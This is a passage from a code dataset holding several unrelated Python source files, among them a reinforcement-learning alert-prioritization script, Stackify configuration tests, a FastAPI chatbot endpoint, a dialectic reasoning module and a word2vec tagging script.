range(len(batch)):\n y_t[k] = rewards[k] + GAMMA*target_q_values[k]\n\n loss += self.critic.model.train_on_batch([states,actions], y_t) \n a_for_grad = self.actor.model.predict(states)\n grads = self.critic.gradients(states, a_for_grad)\n self.actor.train(states, grads)\n self.actor.target_train()\n self.critic.target_train()\n\n total_reward += r_t\n s_t = s_t1\n state_t = state_t1\n\n self.step += 1\n\n logging.info(\"TOTAL REWARD @ %s-th Episode : Reward %s\", str(i), str(total_reward))\n logging.info(\"Total steps: %s\", str(self.step))\n logging.info(\"\")\n\n logging.info(\"Finish.\")\n\ndef flatten_lists(lists):\n \"\"\"\n Construct a single list from a list of lists.\n :param lists: List of lists.\n :return: Single list that contains all the elements of all the lists, in the same order.\n \"\"\" \n return [element for inner in lists for element in inner]\n \ndef unflatten_list(lst, dim):\n \"\"\"\n Construct a list of lists from a single list.\n :param lst: List of elements, size must be a multiple of dim.\n :param dim: Number of elements in each inner list.\n :return: List of lists that contain all the elements of the list.\n \"\"\"\n ##print(len(lst))\n ##print(dim)\n assert((len(lst) % dim) == 0)\n lists = []\n for i in range(len(lst) // dim):\n lists.append([lst[j] for j in range(i * dim, (i + 1) * dim)])\n return lists\n \nclass DefenderBestResponse:\n \"\"\"Best-response investigation policy for the defender.\"\"\"\n def __init__(self, model, alpha):\n \"\"\"\n Construct a best-response object using the DDPG agent.\n :param model: Model of the alert prioritization problem (i.e., Model object).\n :param alpha: Attack policy. 
Function, takes a model and a state, returns the probability of mounting attacks (one-dimensional list) given a model and a state.\n \"\"\"\n agent = DDPGAgent(len(model.alert_types) * model.horizon, len(model.alert_types) * model.horizon)\n def state_update(state, action):\n \"\"\"\n State update function for QLearning.learn.\n :param state: State of the alert prioritization problem (i.e., Model.State object).\n :param action: Action represented as a normalized list of floats.\n :return: Next state (i.e., Model.State object).\n \"\"\"\n delta = model.make_investigation_feasible(state.N, unflatten_list(action, len(model.alert_types))) # make_investigation_feasible ``unnormalizes'' the action\n next_state = model.next_state(state, delta, alpha)\n loss = next_state.U - state.U\n return (next_state, loss)\n agent.learn(Model.State(model),\n lambda state: flatten_lists(state.N),\n state_update)\n \nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s / %(levelname)s: %(message)s', level=logging.DEBUG)\n model = test_model()\n DefenderBestResponse(model, test_attack_action)\n","repo_name":"aronlaszka/AlertPrioritization","sub_path":"code/v1/src/learning_AC.py","file_name":"learning_AC.py","file_ext":"py","file_size_in_byte":8496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43286002499","text":"\"\"\"\nTest the stackify.application module\n\"\"\"\n\nimport unittest\nimport os\nfrom mock import patch\nfrom tests.bases import ClearEnvTest\n\nfrom stackify.constants import API_URL\nfrom stackify.constants import DEFAULT_HTTP_ENDPOINT\nfrom stackify.constants import TRANSPORT_TYPE_AGENT_HTTP\nfrom stackify.constants import TRANSPORT_TYPE_AGENT_SOCKET\nfrom stackify.constants import TRANSPORT_TYPE_DEFAULT\nfrom stackify.transport.application import get_configuration\n\n\nclass TestConfig(ClearEnvTest):\n '''\n Test automatic configuration for the ApiConfiguration\n '''\n\n def test_required_kwargs(self):\n '''API configuration requires appname, env and key'''\n env_map = {}\n\n with patch.dict('os.environ', env_map):\n with self.assertRaises(NameError):\n get_configuration()\n with self.assertRaises(NameError):\n get_configuration(application='1')\n with self.assertRaises(NameError):\n get_configuration(application='1', environment='2')\n with self.assertRaises(NameError):\n get_configuration(application='1', environment='2', api_url='3')\n\n get_configuration(application='1', environment='2', api_key='3')\n\n def test_environment_config(self):\n '''API configuration can load from env vars'''\n env_map = {\n 'STACKIFY_APPLICATION': 'test1_appname',\n 'STACKIFY_ENVIRONMENT': 'test1_environment',\n 'STACKIFY_API_KEY': 'test1_apikey',\n 'STACKIFY_API_URL': 'test1_apiurl',\n }\n\n with patch.dict('os.environ', env_map):\n config = get_configuration()\n\n self.assertEqual(config.application, 'test1_appname')\n self.assertEqual(config.environment, 'test1_environment')\n self.assertEqual(config.api_key, 'test1_apikey')\n self.assertEqual(config.api_url, 'test1_apiurl')\n\n def test_kwarg_mix(self):\n '''API configuration can load from a mix of env vars and kwargs'''\n env_map = {\n 'STACKIFY_APPLICATION': 'test2_appname',\n 'STACKIFY_ENVIRONMENT': 'test2_environment',\n }\n\n with patch.dict('os.environ', env_map):\n config = get_configuration(api_key='test2_apikey', api_url='test2_apiurl')\n\n self.assertEqual(config.application, 'test2_appname')\n self.assertEqual(config.environment, 'test2_environment')\n 
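# added note: env vars supply application/environment here; kwargs fill in the remaining settings\n 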
self.assertEqual(config.api_key, 'test2_apikey')\n self.assertEqual(config.api_url, 'test2_apiurl')\n\n def test_kwargs(self):\n '''API configuration can load from kwargs'''\n config = get_configuration(\n application='test3_appname',\n environment='test3_environment',\n api_key='test3_apikey',\n api_url='test3_apiurl',\n )\n\n self.assertEqual(config.application, 'test3_appname')\n self.assertEqual(config.environment, 'test3_environment')\n self.assertEqual(config.api_key, 'test3_apikey')\n self.assertEqual(config.api_url, 'test3_apiurl')\n\n def test_api_url_default(self):\n '''API URL is set automatically'''\n config = get_configuration(\n application='test4_appname',\n environment='test4_environment',\n api_key='test4_apikey',\n )\n\n self.assertEqual(config.application, 'test4_appname')\n self.assertEqual(config.environment, 'test4_environment')\n self.assertEqual(config.api_key, 'test4_apikey')\n self.assertEqual(config.api_url, API_URL)\n\n def test_transport_default(self):\n config = get_configuration(\n application='test4_appname',\n environment='test4_environment',\n api_key='test4_apikey',\n api_url='test3_apiurl',\n )\n\n self.assertEqual(config.application, 'test4_appname')\n self.assertEqual(config.environment, 'test4_environment')\n self.assertEqual(config.api_key, 'test4_apikey')\n self.assertEqual(config.api_url, 'test3_apiurl')\n self.assertEqual(config.transport, 'default')\n\n def test_transport_given(self):\n config = get_configuration(\n application='test5_appname',\n environment='test5_environment',\n api_key='test5_apikey',\n api_url='test5_apiurl',\n transport='test5_transport'\n )\n\n self.assertEqual(config.application, 'test5_appname')\n self.assertEqual(config.environment, 'test5_environment')\n self.assertEqual(config.api_key, 'test5_apikey')\n self.assertEqual(config.api_url, 'test5_apiurl')\n self.assertEqual(config.transport, 'test5_transport')\n\n def test_api_key_is_required_on_default_transport(self):\n with self.assertRaises(NameError):\n get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='',\n api_url='test_apiurl',\n transport='default'\n )\n\n def test_api_key_is_not_required_on_agent_socket_transport(self):\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='',\n api_url='test_apiurl',\n transport='agent_socket'\n )\n\n self.assertEqual(config.application, 'test_appname')\n self.assertEqual(config.environment, 'test_environment')\n self.assertEqual(config.api_key, '')\n self.assertEqual(config.api_url, 'test_apiurl')\n self.assertEqual(config.transport, 'agent_socket')\n\n\nclass ConfigEnvironmentVariableTest(ClearEnvTest):\n def test_transport_environment_variable_default(self):\n os.environ[\"STACKIFY_TRANSPORT\"] = \"default\"\n\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.transport == TRANSPORT_TYPE_DEFAULT\n\n del os.environ[\"STACKIFY_TRANSPORT\"]\n\n def test_transport_environment_variable_agent_socket(self):\n os.environ[\"STACKIFY_TRANSPORT\"] = \"agent_socket\"\n\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.transport == TRANSPORT_TYPE_AGENT_SOCKET\n\n del os.environ[\"STACKIFY_TRANSPORT\"]\n\n def test_transport_environment_variable_agent_http(self):\n os.environ[\"STACKIFY_TRANSPORT\"] = \"agent_http\"\n\n 
config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.transport == TRANSPORT_TYPE_AGENT_HTTP\n\n del os.environ[\"STACKIFY_TRANSPORT\"]\n\n def test_http_endpoint_environment_variable_default(self):\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.http_endpoint == DEFAULT_HTTP_ENDPOINT\n\n def test_http_endpoint_environment_variable(self):\n os.environ[\"STACKIFY_TRANSPORT_HTTP_ENDPOINT\"] = \"test\"\n\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.http_endpoint == \"test\"\n\n del os.environ[\"STACKIFY_TRANSPORT_HTTP_ENDPOINT\"]\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"stackify/stackify-api-python","sub_path":"tests/transport/test_application.py","file_name":"test_application.py","file_ext":"py","file_size_in_byte":7727,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34636732516","text":"\"\"\"\nDescriptive exception classes for the AIrsenal API\n\"\"\"\n\n\nclass ApiException(Exception):\n status_code = 500\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv[\"status\"] = \"error\"\n rv[\"error\"] = self.message\n return rv\n","repo_name":"alan-turing-institute/AIrsenal","sub_path":"airsenal/api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":243,"dataset":"github-code","pt":"72"} +{"seq_id":"39381922109","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom ans import Ans_frm\nfrom fastapi.middleware.cors import CORSMiddleware\nimport webbrowser\nimport uvicorn\napp = FastAPI(docs_url='/demo/docs', redoc_url='/demo/redocs',openapi_url='/demo/openapi.json')\norigins = [\"*\"]\napp.add_middleware(\nCORSMiddleware,\n # allow_origins=origins,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\nclass QuestionInput(BaseModel):\n question: str\n\n\nqna_testing = Ans_frm()\n\n@app.post(\"/demo/predict\")\nasync def predict(question_input: QuestionInput):\n try:\n question = question_input.question\n print(question)\n out=qna_testing.similarity_search_content(question)\n out1=qna_testing.similarity_search_link(question)\n valid1=out[0][-1] \n if (valid1<0.3):\n out=str(out)\n print(out)\n out1=dict(out1[0][0])\n\n link=qna_testing.link_gen(out1[\"page_content\"])\n answer=qna_testing.extract_answer(out)\n result = {\"answer\": answer,\"link\":link}\n else:\n result=None \n print(result)\n return result\n except Exception as e:\n return {\"error\": str(e)}\nif __name__ == \"__main__\":\n url = \"/home/arnav/college_chatbot/src/chartgpt/chat.html\"\n webbrowser.get('google-chrome').open(url)\n\n uvicorn.run(app, port=8000) \n","repo_name":"Arni-tech/college_chatbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35903687457","text":"from typing import 
Tuple, Mapping, FrozenSet, Set, Collection, MutableMapping, Type, Sequence, Optional\n\nfrom frozendict import frozendict # type: ignore\nfrom pydantic import Field\nfrom pydantic.dataclasses import dataclass\n\nfrom scpy.action.action import Action\nfrom scpy.agent.agent import Agent\nfrom scpy.causal_setting.causal_setting import CausalSetting\nfrom scpy.dataclass_config import DataclassConfig\nfrom scpy.preorder import Preorder\nfrom scpy.primitives import Function, Literal, Predicate\nfrom scpy.situation.situation import Situation\nfrom scpy.state.state import State\nfrom scpy.util import from_function_to_predicate\n\n\n@dataclass(frozen=True, order=True, config=DataclassConfig)\nclass DialecticCausalSetting(CausalSetting):\n fact_set: State = Field(default_factory=frozenset)\n awareness_set: FrozenSet[Predicate] = Field(default_factory=frozenset)\n argument_scheme: Mapping[Function, Tuple[FrozenSet[Literal], FrozenSet[Literal]]] = Field(\n default_factory=frozendict)\n conflict_relation: Preorder = Field(default_factory=Preorder)\n strength_preorder: Preorder = Field(default_factory=Preorder)\n fluents: FrozenSet[Predicate] = Field(init=False, repr=False, default_factory=frozenset)\n actions: FrozenSet[Action] = Field(init=False, repr=False, default_factory=frozenset)\n agents: FrozenSet[Agent] = Field(default_factory=frozenset)\n\n def __post_init__(self) -> None:\n actions: Set[Action] = set()\n if isinstance(self.awareness_set, frozenset):\n for pred in self.awareness_set:\n arg = Literal(pred)\n actions.add(Function('position', (arg,)))\n actions.add(Function('position', (-arg,)))\n if isinstance(self.argument_scheme, Mapping):\n for arg, cogn_ctx in self.argument_scheme.items(): # type: ignore[assignment]\n preds, poses = cogn_ctx\n for pos in poses:\n actions.add(Function('supports', (arg, pos)))\n\n object.__setattr__(self, 'actions', frozenset(actions))\n\n def __extract_argument_position(self, action: Action, symbol: str = 'supports') -> \\\n Tuple[Function, Literal]:\n if action.symbol != symbol:\n raise ValueError(\n f\"Unknown Action {action}. Action.symbol is {action.symbol} but should be {symbol}\")\n if len(action.arguments) < 2:\n raise ValueError(\n f\"Unknown Action {action}. Not enough arguments.\")\n arg = action.arguments[0]\n pos = action.arguments[1]\n if not isinstance(arg, Function):\n raise ValueError(\n f\"Unknown Action {action}. {arg} must be of type Function, but is type {type(arg).__name__}.\")\n if not isinstance(pos, Literal):\n raise ValueError(\n f\"Unknown Action {action}. {pos} must be of type Literal, but is type {type(pos).__name__}.\")\n if arg not in self.argument_scheme:\n raise ValueError(f\"Unknown Action {action}. Argument not in argument scheme.\")\n if pos.predicate not in self.awareness_set:\n raise ValueError(f\"Unknown Action {action}. Position not in awareness set.\")\n e = arg.arguments[0]\n if isinstance(e, Literal):\n if e.predicate not in self.awareness_set:\n raise ValueError(f\"Unknown Action {action}. {e.predicate} not in awareness set.\")\n else:\n assert isinstance(e, Function)\n if len(e.arguments) != 2:\n raise ValueError(f\"Unknown Action {action}. {e} should have exactly two arguments.\")\n c = e.arguments[0]\n if not isinstance(c, Literal):\n raise ValueError(\n f\"Unknown Action {action}. {c} must be of type Literal, but is type {type(c).__name__}.\")\n if c.predicate not in self.awareness_set:\n raise ValueError(\n f\"Unknown Action {action}. 
{c.predicate} not in awareness set.\"\n )\n p = e.arguments[1]\n if isinstance(p, Literal):\n if p.predicate not in self.awareness_set:\n raise ValueError(\n f\"Unknown Action {action}. {p.predicate} not in awareness set.\"\n )\n elif isinstance(p, Function):\n if p.symbol != 'exo':\n raise ValueError(\n f\"Unknown Action {action}. {p} must have the symbol exo.\")\n\n return arg, pos\n\n def __is_well_formed(self, literal: Literal, functor: str, *types: Type) -> bool:\n if literal.predicate.functor != functor:\n return False\n types_: Sequence[Type] = tuple(types)\n if len(types_) < len(literal.predicate.arguments):\n return False\n for i, arg in enumerate(literal.predicate.arguments):\n type_: Type = types_[i]\n # noinspection PyTypeHints\n if not isinstance(arg, type_):\n return False\n if type_ is Literal:\n assert isinstance(arg, Literal)\n if arg.predicate not in self.awareness_set:\n return False\n return True\n\n def __do_initial_state(self, action: Action) -> State:\n if action.symbol != 'position':\n raise ValueError(\n f\"Unknown Action {action}. In initial state Action has to be of form \"\n f\"{Function('position', (Function('Position'),))}.\")\n pos = action.arguments[0]\n if not isinstance(pos, Literal):\n raise ValueError(f\"Unknown Action {action}. Position has to be a Literal\")\n if pos.predicate not in self.awareness_set:\n raise ValueError(f\"Unknown Action {action}. {pos.predicate} is not in the awareness set.\")\n argument_lit = Literal(Predicate('position', (pos,)))\n return frozenset({argument_lit})\n\n def __do_reasoning(self, action: Action, state: State, incomplete: Mapping[Literal, Collection[Literal]],\n functor: str = 'argument') -> State:\n arg, pos = self.__extract_argument_position(action)\n if not (pos in incomplete and not incomplete[pos]) and not any(\n pos in preds for _, preds in incomplete.items()):\n raise ValueError(f\"Unknown Action {action}. Position does not need support.\")\n state_ = set(state)\n argument_pred = Predicate(functor, (arg, pos))\n argument_lit = Literal(argument_pred)\n if -argument_lit in state_:\n state_.remove(-argument_lit)\n state_.add(argument_lit)\n return frozenset(state_)\n\n def __do_attack(self, action: Action, state: State, attack_map: Mapping[Function, Collection[Literal]]) -> State:\n arg, pos = self.__extract_argument_position(action, 'attacks')\n if arg not in attack_map:\n raise ValueError(f\"Unknown action {action}. Does not attack argument.\")\n\n attack_pred = from_function_to_predicate(action)\n attack_lit = Literal(attack_pred)\n state_ = set(state)\n if -attack_lit in state:\n state_.remove(-attack_lit)\n state_.add(attack_lit)\n return frozenset(state_)\n\n def __do_defense(self, action: Action, state: State,\n undefended_attacks: Mapping[Function, Collection[Literal]]) -> State:\n def_argument, def_position = self.__extract_argument_position(action, 'defends')\n if all(self.strength_preorder.is_strictly_preceded(def_argument, att_argument) for att_argument in\n undefended_attacks):\n raise ValueError(f\"Unknown Action {action}. 
Defense is not stronger than attack.\")\n state_ = set(state)\n def_argument_pred = from_function_to_predicate(action)\n def_argument_lit = Literal(def_argument_pred)\n if -def_argument_lit in state_:\n state_.remove(-def_argument_lit)\n state_.add(def_argument_lit)\n return frozenset(state_)\n\n def __do_consolidate(self, state: State) -> State:\n att: Optional[Literal] = None\n attacking = set()\n defending = set()\n for literal in state:\n if self.__is_well_formed(literal, 'attacks', Function, Literal):\n functor = literal.predicate.functor\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n lit = Literal(Predicate(functor, (arg, -pos)))\n attacking.add(lit)\n att = literal\n elif self.__is_well_formed(literal, 'defends', Function, Literal):\n defending.add(literal)\n changed = True\n while changed:\n changed = False\n for literal in state:\n if self.__is_well_formed(literal, 'supports', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n for coll in (attacking, defending):\n if literal in coll:\n continue\n for elem in coll:\n arg, _ = elem.predicate.arguments\n assert isinstance(arg, Function)\n preds, _ = self.argument_scheme[arg]\n if pos in preds:\n changed = True\n coll.add(literal)\n break\n\n state_ = set(state)\n for attack in attacking:\n counterargument = Literal(Predicate('counterargument', attack.predicate.arguments))\n if -counterargument in state_:\n state_.remove(-counterargument)\n state_.add(counterargument)\n\n for defence in defending:\n arg = Literal(Predicate('argument', defence.predicate.arguments))\n if -arg in state_:\n state_.remove(-arg)\n state_.add(arg)\n state_ -= (attacking | defending)\n assert not attacking or att is not None\n if att is not None:\n state_.remove(att)\n return frozenset(state_)\n\n def unsupported_literals(self, state: State, argument: Function) -> Collection[Literal]:\n preds, poses = self.argument_scheme[argument]\n supported = set()\n for literal in state:\n if self.__is_well_formed(literal, 'supports', Function, Literal):\n arg, pos = literal.predicate.arguments\n supported.add(pos)\n return {pred for pred in preds if pred not in supported}\n\n def attacks(self, state: State) -> Mapping[Function, Collection[Literal]]:\n arguments = set()\n counterarguments = set()\n for literal in state:\n if self.__is_well_formed(literal, 'argument', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n arguments.add((arg, pos))\n elif self.__is_well_formed(literal, 'attacks', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n counterarguments.add((arg, pos))\n att: MutableMapping[Function, Set[Literal]] = {}\n for (arg, pos) in arguments:\n attacks_ = {counterargument for counterargument in self.conflict_relation[arg]\n if (counterargument, -pos) not in counterarguments}\n\n attacks_ |= {counterargument for (counterargument, (preds, poses)) in self.argument_scheme.items()\n if -pos in poses}\n\n for attack in attacks_:\n att.setdefault(attack, set()).add(pos)\n\n return att\n\n def incomplete_reasoning(self, state: State, functor: str = 'attacks') -> Mapping[Literal, Function]:\n reasoning: MutableMapping[Literal, Function] = {}\n supporting: MutableMapping[Literal, Function] = {}\n for literal in state:\n if self.__is_well_formed(literal, functor, 
Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n reasoning[pos] = arg\n elif self.__is_well_formed(literal, 'supports', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n supporting[pos] = arg\n\n incomplete_reasoning: MutableMapping[Literal, Function] = {}\n\n for pos, arg in reasoning.items():\n preds, _ = self.argument_scheme[arg]\n if not all(pred in supporting for pred in preds):\n incomplete_reasoning[pos] = arg\n\n return incomplete_reasoning\n\n def undefended_attacks(self, state: State) -> Mapping[Function, Collection[Literal]]:\n attacking: MutableMapping[Function, Set[Literal]] = {}\n defending: MutableMapping[Function, Set[Literal]] = {}\n for literal in state:\n if self.__is_well_formed(literal, 'attacks', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n attacking.setdefault(arg, set()).add(-pos)\n elif self.__is_well_formed(literal, 'supports', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n attacking.setdefault(arg, set()).add(pos)\n elif self.__is_well_formed(literal, 'defends', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n defending.setdefault(arg, set()).add(pos)\n\n defended = False\n strong_defense_needed = False\n strong_defended = False\n for att_argument, att_positions in attacking.items():\n for def_argument, def_positions in defending.items():\n if self.strength_preorder.is_strictly_preceded(def_argument, att_argument):\n strong_defense_needed = True\n if self.strength_preorder.is_strictly_preceded(att_argument, def_argument):\n strong_defended = True\n if any(-att_position in def_positions for att_position in att_positions):\n defended = True\n\n if not defended or strong_defense_needed and not strong_defended:\n return attacking\n return {}\n\n def incomplete_arguments(self, state: State) -> Mapping[Literal, Collection[Literal]]:\n positions: Set[Literal] = set()\n facts: Set[Function] = set()\n hypotheses: Set[Function] = set()\n arguments: Set[Function] = set()\n\n for literal in state:\n if self.__is_well_formed(literal, 'position', Literal):\n pos = literal.predicate.arguments[0]\n assert isinstance(pos, Literal)\n positions.add(pos)\n elif self.__is_well_formed(literal, 'argument', Function, Literal):\n arg = literal.predicate.arguments[0]\n assert isinstance(arg, Function)\n if arg.symbol == 'fact':\n facts.add(arg)\n elif arg.symbol == 'hyp':\n hypotheses.add(arg)\n else:\n arguments.add(arg)\n\n supported: Set[Literal] = {f.arguments[0] for f in facts if isinstance(f.arguments[0], Literal)} | {\n h.arguments[0] for h in hypotheses if isinstance(h.arguments[0], Literal)}\n incomplete: MutableMapping[Literal, Set[Literal]] = {}\n for pos in positions:\n if pos not in supported:\n incomplete[pos] = set()\n for arg in arguments:\n assert isinstance(arg, Function)\n assert arg in self.argument_scheme\n preds, poses = self.argument_scheme[arg]\n incomplete_ = set()\n for pred in preds:\n if pred not in supported:\n incomplete_.add(pred)\n if not incomplete_:\n supported.update(poses)\n next_incomplete = dict(incomplete)\n for pos, preds_ in incomplete.items():\n if preds_ <= poses:\n del next_incomplete[pos]\n supported.add(pos)\n incomplete = 
next_incomplete\n else:\n for pos in poses:\n incomplete.setdefault(pos, set())\n incomplete[pos].update(incomplete_)\n return incomplete\n\n def do_state(self, action: Action, state: State) -> State:\n if not state:\n return self.__do_initial_state(action)\n incomplete_arguments = self.incomplete_arguments(state)\n if incomplete_arguments:\n return self.__do_reasoning(action, state, incomplete_arguments, 'argument')\n incomplete_attacks = self.incomplete_reasoning(state, 'attacks')\n if incomplete_attacks:\n incomplete = {}\n for lit, arg in incomplete_attacks.items():\n incomplete[lit] = self.unsupported_literals(state, arg)\n return self.__do_reasoning(action, state, incomplete, 'supports')\n incomplete_defends = self.incomplete_reasoning(state, 'defends')\n if incomplete_defends:\n incomplete = {}\n for lit, arg in incomplete_defends.items():\n incomplete[lit] = self.unsupported_literals(state, arg)\n return self.__do_reasoning(action, state, incomplete, 'supports')\n undefended_attacks = self.undefended_attacks(state)\n if undefended_attacks:\n for attack, att_posses in undefended_attacks.items():\n if attack.symbol == 'exo_e':\n if any(self.__is_well_formed(literal, 'defends', Function, Literal) for literal in state):\n continue\n\n for possible_defence in self.argument_scheme:\n if attack.symbol == 'fact' and possible_defence.symbol != 'fact':\n continue\n if self.strength_preorder.is_strictly_preceded(possible_defence, attack):\n continue\n if not self.conflict_relation.is_similar(attack, possible_defence):\n if possible_defence not in self.argument_scheme:\n continue\n if not any(-att_pos in self.argument_scheme[possible_defence][1] for att_pos in att_posses):\n continue\n if possible_defence.symbol == 'fact':\n f = possible_defence.arguments[0]\n assert isinstance(f, Literal)\n if f not in self.fact_set:\n continue\n if possible_defence.symbol == 'hyp':\n if not self.strength_preorder.is_preceded(attack, possible_defence):\n continue\n return self.__do_defense(action, state, undefended_attacks)\n if is_consolidate(action):\n return self.__do_consolidate(state)\n att = self.attacks(state)\n if att:\n return self.__do_attack(action, state, att)\n return state\n\n def poss(self, action: Action, situation: Situation) -> bool:\n return self.poss_state(action, situation.state)\n\n def poss_state(self, action: Action, state: State) -> bool:\n pass\n\n\ndef is_consolidate(action: Action) -> bool:\n return action.symbol == 'consolidate' and not action.arguments\n\n\nconsolidate_action: Action = Function('consolidate')\n\n\ndef fact(lit: Literal) -> Function:\n return Function('fact', (lit,))\n\n\ndef hyp(lit: Literal) -> Function:\n return Function('hyp', (lit,))\n\n\ndef suff_p(cond: Literal, pos: Literal) -> Function:\n return Function('suff_p', (Function('cond_for', (cond, pos)),))\n\n\ndef necc_p(cond: Literal, pos: Literal) -> Function:\n return Function('necc_p', (Function('cond_for', (cond, pos)),))\n\n\ndef suff_e(cond: Literal, pos: Literal) -> Function:\n return Function('suff_e', (Function('cond_for', (cond, pos)),))\n\n\ndef necc_e(cond: Literal, pos: Literal) -> Function:\n return Function('necc_e', (Function('cond_for', (cond, pos)),))\n\n\ndef sec_suff_p(cond: Literal, pos: Literal) -> Function:\n return Function('sec_suff_p', (Function('cond_for', (cond, pos)),))\n\n\ndef sec_necc_p(cond: Literal, pos: Literal) -> Function:\n return Function('sec_necc_p', (Function('cond_for', (cond, pos)),))\n\n\ndef sec_suff_e(cond: Literal, pos: Literal) -> Function:\n return 
Function('sec_suff_e', (Function('cond_for', (cond, pos)),))\n\n\ndef exo_e(pos: Literal) -> Function:\n return Function('exo_e', (Function('cond_for', (pos, Function('exo', (pos,)))),))\n\n\ndef position_literal(pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('position', (pos,)), sign)\n\n\ndef argument_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('argument', (arg, pos)), sign)\n\n\ndef counterargument_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('counterargument', (arg, pos)), sign)\n\n\ndef supports_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('supports', (arg, pos)), sign)\n\n\ndef attacks_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('attacks', (arg, pos)), sign)\n\n\ndef defends_literal(arg: Function, pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('defends', (arg, pos)), sign)\n\n\ndef exo_literal(pos: Literal, sign: bool = True) -> Literal:\n return Literal(Predicate('exo', (pos,)), sign)\n\n\ndef position_action(arg: Function, pos: Literal) -> Action:\n return Function('position', (arg, pos))\n\n\ndef argument_action(arg: Function, pos: Literal) -> Action:\n return Function('argument', (arg, pos))\n\n\ndef counterargument_action(arg: Function, pos: Literal) -> Action:\n return Function('counterargument', (arg, pos))\n\n\ndef supports_action(arg: Function, pos: Literal) -> Action:\n return Function('supports', (arg, pos))\n\n\ndef attacks_action(arg: Function, pos: Literal) -> Action:\n return Function('attacks', (arg, pos))\n\n\ndef defends_action(arg: Function, pos: Literal) -> Action:\n return Function('defends', (arg, pos))\n","repo_name":"Entze/SitCalcPy","sub_path":"scpy/causal_setting/dialectic_causal_setting.py","file_name":"dialectic_causal_setting.py","file_ext":"py","file_size_in_byte":22918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43079033594","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom random import sample\nimport re\n\nimport string\nimport nltk\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.probability import FreqDist\n\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer \n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nimport gensim\nimport statistics\n\n\nstop_words=set(stopwords.words(\"english\"))\n \nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('wordnet')\n\nstop_words=set(stopwords.words(\"english\"))\nlemmatizer = WordNetLemmatizer() \n\n\ndef cleaning_bow_for_training(data):\n \n new_data=data.dropna(how='all', axis=1)\n bow=data.iloc[:,2:].values.tolist()\n \n cleaned_data = [\n [w for w in l if isinstance(w, str)] \n for l in bow\n ]\n return cleaned_data\n\ndef running_model(training_bow):\n model = gensim.models.Word2Vec(training_bow, min_count=1, sg=1)\n model.train(training_bow, total_examples=model.corpus_count, epochs=model.epochs)\n model.wv\n return model\n\n\ndef tags_from_lists(bow, model):\n tags_lists=[]\n for lst in bow:\n while True:\n if len(lst) == 0:\n break\n try:\n tags=model.wv.most_similar(positive=lst, topn=20)\n tags_lists.append(tags)\n except KeyError as e:\n search = re.search(\"'(\\w+)'\", e.args[0])\n if search:\n word = 
